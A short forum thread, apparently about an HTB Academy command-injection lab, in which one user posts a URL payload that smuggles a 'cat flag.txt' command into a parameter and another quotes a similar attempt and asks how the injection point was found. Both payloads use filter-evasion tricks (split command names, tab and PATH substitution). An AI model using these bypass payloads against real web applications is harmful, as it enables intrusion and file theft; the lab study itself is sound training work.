HTB-Academy Command Injection Skills Assessment

I solved Command Injection Skill Assessment with payload:
?to=&from=2380029473.txt%26c\a\t%09${PATH:0:1}flag.txt&finish=1&move=1

5 Likes

Thank you! but what is your logic to get there? When I try to inject I do a search for something random and then I try to inject here
ajax=true&content=poc&path=.&type=search%26c\a\t%09${PATH:0:1}flag.txt

How did you come to that conclusion of injecting into the URL and not into the burpsuite field and where did you find &from= because I only see /index.php?to=